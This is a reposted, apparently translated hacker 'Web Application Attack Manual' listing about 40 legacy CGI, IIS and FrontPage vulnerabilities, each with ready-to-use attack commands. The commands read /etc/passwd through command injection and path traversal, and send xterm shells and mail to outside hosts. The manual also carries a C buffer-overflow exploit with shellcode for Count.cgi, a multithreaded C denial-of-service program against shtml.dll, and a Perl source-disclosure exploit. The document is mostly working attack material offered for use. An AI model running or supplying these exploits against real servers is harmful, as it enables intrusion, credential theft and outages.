Web Application Attack Manual (repost)
A while ago I read 小许's "CGI Vulnerability Attack Manual version-0.02" and felt that this kind of article is really important. But web application attacks today are no longer limited to CGI and .pl programs, so this time I collected some common ASP program vulnerabilities from the net and added them in, renamed the piece "Web Application Attack Manual", and completed the incomplete Count.cgi attack section of the original "CGI Vulnerability Attack Manual version-0.02". I hope it is of some help to everyone! ---- 无用君

1. phf vulnerability

The phf hole is probably the most classic of all; nearly every article introduces it. It lets you execute commands on the server, for example to display /etc/passwd:

lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

But can we still find it anywhere?

2. php.cgi 2.0beta10 or earlier

Can read any file that nobody has permission to read.

lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

php.cgi 2.1 can only read shtml files.
As for the password file, comrades should keep in mind that it may also live in /etc/master.passwd, /etc/security/passwd and the like.

3. whois_raw.cgi

lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

4. faxsurvey

lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

5. textcounter.pl

If the server has textcounter.pl, anyone can execute commands with the privileges of the http daemon.

#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml';      # please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root';            # please _DO_ _modify_ this
if ($ARGV[0]) {
    $CMD=$ARGV[0];
} else {
    $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanothere_one";
}
$text="${URL}/;IFS=8;${CMD};echo|";
$text =~ s/ /\${IFS}/g;
#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text);   # if there is no wget command, lynx can be used instead
#system({"lynx"} "lynx", $text);

6. Vulnerability in some versions (1.1) of info2www

$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami
$ You have new mail.
$

To be honest, I don't quite understand this one. :(

7. pfdispaly.cgi

lynx -source 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

pfdisplay.cgi has another vulnerability that allows command execution:

lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
or
lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

8. wrap

lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

9. www-sql

Lets you read some restricted pages. For example, if you enter http://your.server/protected/something.html in your browser, you are asked for a username and password. With www-sql that is unnecessary:

http://your.server/cgi-bin/www-sql/protected/something.html

10. view-source

lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd

11. campas

lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

12. webgais

telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)

query=';mail+drazvan@pop3.kappa.ro

13. websendmail

telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+your_address@somewhere.org

14. handler

telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download
or
GET /cgi-bin/handler/;xterm -display danish:0 -e /bin/sh|?data=Download

Note: the separator after cat is the TAB key, not a space. The server will report that it cannot open useless_shit, but it still executes the command that follows.

15. test-cgi

lynx http://www.victim.com/cgi-bin/test-cgi?whatever

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

This reveals some of the http server's directories.

lynx http://www.victim.com/cgi-bin/test-cgi?help&0a/bin/cat%20/etc/passwd

This trick doesn't seem to work. :(

lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*

You can also try these:

GET /cgi-bin/test-cgi?* HTTP/1.0
GET /cgi-bin/test-cgi?x *
GET /cgi-bin/nph-test-cgi?* HTTP/1.0
GET /cgi-bin/nph-test-cgi?x *
GET /cgi-bin/test-cgi?x HTTP/1.0 *
GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

16. Apache on some BSDs

On some BSD Apache servers you can do:

lynx http://www.victim.com/root/etc/passwd
lynx http://www.victim.com/~root/etc/passwd

17. htmlscript

lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

18. jj.c

The demo cgi program jj.c calls /bin/mail without filtering user input, so any program based on jj.c could potentially be exploited by simply adding a followed by a Unix command. It may require a password, but two known passwords include HTTPdrocks and SDGROCKS. If you can retrieve a copy of the compiled program, running strings on it will probably reveal the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions.

19. FrontPage extensions

If you read http://www.victim.com/_vti_inf.html you get the version of the FP extensions and their path on the server.
There are also password files such as:

http://www.victim.com/_vti_pvt/service.pwd
http://www.victim.com/_vti_pvt/users.pwd
http://www.victim.com/_vti_pvt/authors.pwd
http://www.victim.com/_vti_pvt/administrators.pwd

20. Freestats.com CGI

I have not run into this one, and I feel certain details must not be gotten wrong, so I am pasting the English directly.

John Carlton found the following. He developed an exploit for the free web stats services offered at freestats.com, and supplied the webmaster with proper code to patch the bug.
Start an account with freestats.com, and log in. Click on the area that says "CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO". This will call up a file called edit.pl with your user # and password included in it. Save this file to your hard disk and open it with notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from *input type=hidden name=account value=your#* to *input type=text name=account value=""*. Save your page and load it into your browser. There will now be a text input box where the hidden element was before. Simply type a # in and push the "click here to update user profile" and all the information that appears on your screen has now been written to that user profile. But that isn't the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you could change the password on all of their accounts with a simple JavaScript function. Deep inside the web site authors still have the good old "edit.pl" script. It takes some time to reach it (unlike the path described) but you can reach it directly at:

http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

21. Vulnerability in Glimpse HTTP

telnet target.machine.com 80
GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor@dhp.com HTTP/1.0

22. Count.cgi

This program only works against Count.cgi versions below 24:

/*### count.c ########################################################*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <getopt.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>

/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);
int openhost(char *, int);

/* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0";

char endpad[]=
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";

int main (int argc, char *argv[]){
    char *shellcode = NULL;
    int cnt,ver,retcount, dispnum,dotquads[4],offset;
    unsigned long sp;
    char dispname[255];
    char *host;

    offset = sp = cnt = ver = 0;
    fprintf(stderr,"\t%s - Gus\n",argv[0]);
    if (argc<3) usage(argv[0]);
    while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {
        switch(cnt){
        case 'h':
            host = optarg;
            break;
        case 'd': {
            /* display is given as a.b.c.d:n and padded to a fixed width so the payload length stays constant */
            retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
                &dotquads[0], &dotquads[1], &dotquads[2], &dotquads[3], &dispnum);
            if (retcount != 5) usage(argv[0]);
            sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
                dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);
            shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad));
            sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
        }
            break;
        case 'v':
            ver = atoi(optarg);
            break;
        case 'o':
            offset = atoi(optarg);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }
    sp = offset + getsp(ver);
    (void)doit(host,sp,shellcode);
    exit(0);
}

unsigned long getsp(int ver)
{
    /* Get the stack pointer we should be using. YMMV.
       If it does not work, try using -o X, where x is between -1500 and 1500 */
    unsigned long sp=0;
    if (ver == 15) sp = 0xbfffea50;
    if (ver == 20) sp = 0xbfffea50;
    if (ver == 22) sp = 0xbfffeab4;
    if (ver == 23) sp = 0xbfffee38;  /* Dunno about this one */
    if (sp == 0) {
        fprintf(stderr,"I don't have an sp for that version try using the -o option.\n");
        fprintf(stderr,"Versions above 24 are patched for this bug.\n");
        exit(1);
    } else {
        return sp;
    }
}

int usage (char *name)
{
    fprintf(stderr,"\tUsage:%s -h host -d <display> -v <version> [-o <offset>]\n",name);
    fprintf(stderr,"\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n",name);
    exit(1);
}

int openhost (char *host, int port)
{
    int sock;
    struct hostent *he;
    struct sockaddr_in sa;

    he = gethostbyname(host);
    if (he == NULL) {
        perror("Bad hostname\n");
        exit(-1);
    }
    memcpy(&sa.sin_addr, he->h_addr, he->h_length);
    sa.sin_port=htons(port);
    sa.sin_family=AF_INET;
    sock=socket(AF_INET,SOCK_STREAM,0);
    if (sock < 0) {
        perror ("cannot open socket");
        exit(-1);
    }
    bzero(&sa.sin_zero,sizeof (sa.sin_zero));
    if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
        perror("cannot connect to host");
        exit(-1);
    }
    return(sock);
}

void doit (char *host,long sp, char *shellcode)
{
    int cnt,sock;
    char qs[7000];
    int bufsize = 16;
    char buf[bufsize];
    char chain[] = "user=a";

    bzero(buf, bufsize);
    /* fill the query string with the (little-endian) return address */
    for(cnt=0;cnt<4104;cnt+=4) {
        qs[cnt+0] = sp & 0x000000ff;
        qs[cnt+1] = (sp & 0x0000ff00) >> 8;
        qs[cnt+2] = (sp & 0x00ff0000) >> 16;
        qs[cnt+3] = (sp & 0xff000000) >> 24;
    }
    strcpy(qs,chain);
    qs[strlen(chain)]=0x90;
    qs[4104]= sp&0x000000ff; qs[4105]=(sp&0x0000ff00)>>8; qs[4106]=(sp&0x00ff0000)>>16; qs[4107]=(sp&0xff000000)>>24;
    qs[4108]= sp&0x000000ff; qs[4109]=(sp&0x0000ff00)>>8; qs[4110]=(sp&0x00ff0000)>>16; qs[4111]=(sp&0xff000000)>>24;
    qs[4112]= sp&0x000000ff; qs[4113]=(sp&0x0000ff00)>>8; qs[4114]=(sp&0x00ff0000)>>16; qs[4115]=(sp&0xff000000)>>24;
    qs[4116]= sp&0x000000ff; qs[4117]=(sp&0x0000ff00)>>8; qs[4118]=(sp&0x00ff0000)>>16; qs[4119]=(sp&0xff000000)>>24;
    qs[4120]= sp&0x000000ff; qs[4121]=(sp&0x0000ff00)>>8; qs[4122]=(sp&0x00ff0000)>>16; qs[4123]=(sp&0xff000000)>>24;
    qs[4124]= sp&0x000000ff; qs[4125]=(sp&0x0000ff00)>>8; qs[4126]=(sp&0x00ff0000)>>16; qs[4127]=(sp&0xff000000)>>24;
    qs[4128]= sp&0x000000ff; qs[4129]=(sp&0x0000ff00)>>8; qs[4130]=(sp&0x00ff0000)>>16; qs[4131]=(sp&0xff000000)>>24;
    strcpy((char*)&qs[4132],shellcode);

    sock = openhost(host,80);
    write(sock,"GET /cgi-bin/Count.cgi?",23);
    write(sock,qs,strlen(qs));
    write(sock," HTTP/1.0\n",10);
    write(sock,"User-Agent: ",12);
    write(sock,qs,strlen(qs));
    write(sock,"\n\n",2);
    sleep(1);
    /* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %s\n\n",qs,qs); */
    /* setenv("HTTP_USER_AGENT",qs,1);
       setenv("QUERY_STRING",qs,1);
       system("./Count.cgi"); */
}

Usage: count -h <target IP> -d <display> -v <Count.cgi version>
For example: count -h www.foo.bar -d 127.0.0.1:0 -v 22

Viewing images with Count.cgi:

http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif

23. finger.cgi

lynx http://www.victim.com/cgi-bin/finger?@localhost

Gets the names of the users logged in on the host.

24. man.sh

Robert Moniot found the following. The May 1998 issue of SysAdmin Magazine contains an article, "Web-Enabled Man Pages", which includes source code for a very nice cgi script named man.sh to feed man pages to a web browser. The hypertext links to other man pages are an especially attractive feature. Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can run any system commands with the user id of the web server and obtain the output from them in a web page.

25. FormHandler.cgi

Add it to the form, and /etc/passwd will turn up in your mailbox.

26. JFS

I believe everyone has read the article "JFS's detailed account of breaking into the PCWEEK Linux host", in which he used the photoads CGI module to break into the host. I have not actually tried this attack; my understanding from the article is as follows. First:

lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?
AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%
0a11111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&pa
ssword=0&CityStPhone=0&Renewed=0"

This creates a new AD entry and bypasses the $AdNum check. After that, use

lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?
file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111&DataFile=1&Password=0&FILE
_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/
../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'

to create or overwrite any file that user nobody has permission to write. I am not sure whether my understanding is right; I could not find the to_url script in its zip package. Does any comrade know?

27. backdoor

I see that some current versions of cgichk.c check for the trojans unlg1.1 and rwwwshell.pl. The former was written by UnlG and I have not seen its source; there is one written by THC, and packetstorm has the source of its version 1.6.

28. shtml.dll

On FrontPage Extension Server / Windows 2000 Server, requesting a file that does not exist reveals the local path of the web directory:

http://www.victim.com/_vti_bin/shtml.dll/something.html

This returns the following message:

Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
But if we request a file whose extension is not HTML, SHTML or ASP, we get a different message:

http://207.69.190.42/_vti_bin/shtml.dll/something.exe

shtml.dll recognises and processes even very long filenames carrying an html suffix. Using this, a DoS attack can be carried out against an IIS server. The following program drives the target server's CPU usage to 100% and uses up all of the application log space; within a few minutes the system reports that the application log is full:

#include <stdio.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>
#include <process.h>

void Dos(void *chara);

void main(int argc,char *argv[])
{
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;
    long lDo ;

    if (argc < 2) {
        printf("Usage: %s IP\n",argv[0]);
        exit(1);
        return ;
    }
    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
        return;
    }
    if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 ) {
        WSACleanup( );
        return;
    }
    printf("wait ...\n");
    /* start 1000 threads, each holding one connection open */
    for (lDo = 0 ;lDo < 1000;lDo++) {
        //printf("1\n");
        _beginthread(Dos, 0, (void*)argv[1]);
    }
    Sleep( 1000000L );
}

void Dos(void *chara)
{
    long lLen;
    long lDo ;
    char *ip ;
    char buffer[2000];
    struct sockaddr_in serv_addr;
    SOCKET sockfd ;
    char plusvuln[]="GET /_vti_bin/shtml.dll/";

    ip= (char*)chara;
    memset(buffer,'0',2000);
    serv_addr.sin_family =AF_INET;
    serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");
    serv_addr.sin_port = htons(80);
    if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0) {
        printf("Create Socket faild \n");
        return ;
    }
    if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0) {
        printf("Connect faild \n");;
    } else {
        /* send the shtml.dll prefix, then a very long filename, then the .html suffix */
        lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );
        for (lDo = 0 ;lDo < 7000;lDo ++) {
            lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;
            if (lLen < 0 ) {
                printf("Send faild \n");
                return;
            }
        }
        lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;
        //recv(sockfd,buffer,2000,0);
        //printf(buffer);
        //printf("\n");
    }
    closesocket(sockfd);
}

29. ASP source code disclosure

http://somewhere/something.asp::$DATA
Fix: install sp3

http://somewhere/something.asp%2e
Fix: install sp4

http://somewhere/something.asp. (append a dot)
Fix: install sp4

http://somewhere/something%2e%41sp
or
http://somewhere/something%2e%asp
Fix: install sp4

http://somewhere/something.asp%81
Fix: install sp6 or apply the patch

30. null.htw

If there are asp files under your web directory, e.g. http://www.xxx.com/asp/index.asp exists, entering the following path shows the source:

http://www.xxx.com/null.htw?CiWebHitsFile=/asp/index.asp%20?CiRestriction=noneCiHiliteType=Full

31. showcode.asp

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp

32. SHTML.EXE

This vulnerability is exploited by requesting, through the FrontPage Server Extensions shtml.exe, a URL whose path ends in a DOS device name with an .htm extension.

http://www.example.com/_vti_bin/shtml.exe/com1.htm
http://www.example.com/_vti_bin/shtml.exe/prn.htm
http://www.example.com/_vti_bin/shtml.exe/aux.htm
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm
http://www.example.com/_vti_bin/shtml.exe/com1.asp
http://www.example.com/_vti_bin/shtml.exe/com1
http://www.example.com/_vti_bin/shtml.exe/prn
http://www.example.com/_vti_bin/shtml.exe/com1
http://www.example.com/_vti_bin/shtml.exe/aux
http://www.example.com/_vti_bin/shtml.exe/pipe.htm

33. htimage.exe

htimage has three security problems:

1. It exposes the local disk path of the web root. As you saw above, the following request reveals the disk location of the target's web directory:

http://www.xxx.com/cgi-bin/htimage.exe/linux?0,0

CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple buffer overflow 3) Allow us to access files.

2. Buffer overflow: tested on Windows 9x against servers running Microsoft-PWS-95/2.0 and FrontPage-PWS32.

http://www.xxx.com/cgi-bin/htimage.exe/<741 characters>?0,0

The following error then appears on the target's console:

HTIMAGE caused an invalid page fault in module <unknown> at 0000:41414141.
Registers:
EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:
Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c

The server keeps running and returns "500 Server Error".

3. Files can be accessed, but not read:

http://www.xxx.com/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0

Output:

---------------------------------------------------------------------------
Error
Error calling HTImage: HTImage.c: Syntax error at line 1
Bad field name, expecting 'default', 'rectangle', 'circle' or 'polygon' (got an alphanumeric string)
---------------------------------------------------------------------------

NOTE: Accessing "/_vti_pvt/service.pwd" outputs: 403 Forbidden

34. *.idc *.idq path disclosure

In IIS 4.0 without Service Pack 5, entering this path under www:

http://www.xxx.com/*.idc

produces:

运行查询错误 无法打开查询文件 e:\web\*.idc。可能是文件不存在或是您没有打开文件所需的许可权。

This was fixed in sp5. In IIS 5.0, however, the problem resurfaced, for example on Microsoft's own site:

http://www.microsoft.com/vstudio/1.idq

produces:

The IDQ file d:\http\products\developer\devonly\prodinfo\vstudio\1.idq could not be found.

Entering

http://www.microsoft.com/1.ida

produces:

The IDQ file d:\http\1.idq could not be found.
35. webhit.dll

IIS 4.0 has an application mapping htw ---> webhits.dll, used for Index Server's hit-highlighting feature. The mapping stays active even if you do not run Index Server. This application mapping is vulnerable and lets an intruder read files on the local disk, database files and ASP source code! There are two ways to do it. First, if a file with the .htw suffix exists on your web server, the following request shows the contents of a file, here odbc.ini:

http://www.xxx.com/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/odbc.ini?CiRestriction=noneCiHiliteType=Full

In a typical IIS installation .htw files can be found at:

/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw

Second, if no such file exists on your web server, a vulnerable system still lets a user invoke webhits.dll, as follows:

http://www.xxx.com/default.htm%20%20%20%20%20.htw?CiWebHitsFile=/../../winnt/odbc.ini?CiRestriction=noneCiHiliteType=Full

The condition is that default.htm must exist. It can be some other file, but it must exist; webhits.dll opens this file as a temporary file. Once the number of %20 space characters in the URL reaches a certain count, the web service's recognition breaks down and webhits.dll opens the specified file winnt\odbc.ini. If that succeeds, the same method opens more files, including ASP code. The following code shows the approximate principle:

FILE *fd;

int DoesTemplateExist(char *pathtohtwfile)
{
    // Just in case inetinfo.exe passes too long a string
    // let's make sure it's of a suitable length and not
    // going to open a buffer overrun vulnerability
    char *file;
    file = (char *)malloc(250);
    strncpy(file,pathtohtwfile,250);
    fd = fopen(file,"r");
    // Success
    if(fd !=NULL) {
        return 1;
    }
    // failed
    else {
        return 0;
    }
}

36. Translate:f

In Win2000 and Office 2000 (including FrontPage 2000 and the FrontPage 2000 Server Extensions), WebDAV has a security problem known as Translate:f. When someone sends an HTTP GET request that carries the header "Translate: f" for an ASP/ASA (or other script) file on the target machine, Windows 2000 without the SP1 patch (and not many have patched yet) returns the source code of the ASP/ASA instead of the processed file it should return (a special character "/" must also be appended to the end of the URL). smiler published a Perl exploit for this vulnerability:

-----------------------------start------------------------------------------------
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven't tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG

if (not $ARGV[0]) {
print qq~
Geee it's running !! kewl )
Usage : srcgrab.pl <complete url of file to retrieve>
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save
~;
exit;}

$victimurl=$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\';   # Here is the backslash at the end of the url
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f');   # Here is the famous translate header )
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
    print $res->content;
}
else {
    print $res->error_as_HTML;
}
---------------------------------end---------------------------------------

To use this program you may need to download several Perl modules (search for them at http://www.perl.org):

1. libwww-perl-5.48.tar.gz
2. URI-1.09.tar.gz
3. HTML-Parser-3.11.tar.gz

Each package is only a few tens of KB. After downloading and unpacking, enter the directory and run

#perl Makefile.PL&&make&&make install

and that is it. Have fun. (For some asp files you may need to append ? or / to the URL before the source shows.)

37. ftp.pl

http://www.server.com/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc

This exposes all files under the etc directory. By the same token you can browse the contents of other directories, breaking out of the ftp directory's own restriction.

38. CGI-World Poll

Any remote user can specify it in a GET request, leading to unauthorized file access:

http://www.victim.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00

39. Big Brother

Big Brother 1.4H and earlier have a security problem: a script fails to check the input variable $HOSTSVC properly, so a remote user can specify a path and view the contents of arbitrary system files.

http://www.victim.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd

40. Nortel Contivity package CGI

An intruder or malicious user can view any file on the system with a URL like the following:

http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.
